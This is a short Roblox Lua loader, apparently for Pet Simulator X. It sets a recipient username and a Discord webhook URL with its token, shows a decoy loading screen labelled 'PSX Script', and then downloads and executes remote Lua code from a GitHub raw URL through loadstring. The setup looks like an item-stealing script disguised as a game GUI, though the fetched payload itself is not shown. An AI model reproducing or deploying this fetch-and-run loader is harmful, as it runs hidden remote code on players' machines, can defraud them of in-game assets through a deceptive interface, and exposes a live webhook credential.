Username = "huzen2424"
WebHook = "https://discord.com/api/webhooks/1087492773877403648/N1567RDaYE5OIbLSa1dfY5baAE1_lwNBaa95Be8cyAheJc58VQ3l3koW93AcBHHV1qdp"

loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
